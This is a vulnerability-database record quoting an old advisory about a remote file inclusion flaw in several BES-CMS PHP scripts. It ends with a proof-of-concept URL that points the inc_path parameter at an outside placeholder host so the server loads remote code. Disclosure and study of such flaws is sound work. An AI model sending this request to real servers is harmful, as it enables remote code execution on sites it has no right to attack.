{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nBES-CMS 0.40.5 - start.php File Inclusion", "edition": 1, "reporter": "frog", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2003-12-20T00:00:00", "title": "BES-CMS 0.40.5 - start.php File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:05", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-04-01T19:04:05", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-12-20T00:00:00", "id": "EXPLOITPACK:630EC12D31D66190430EDC91BDBB2D47", "href": "", "viewCount": 2, "sourceData": "source: https://www.securityfocus.com/bid/9268/info\n \nIt has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software.\n \nBES-CMS versions 0.4 rc3 and 0.5 rc3 are reported to be vulnerable to this issue, however other versions may be affected as well.\n\nhttp://www.example.com/Include/Start.php?inc_path=http://www.example/", "cvss": {"score": 0.0, "vector": "NONE"}}

{}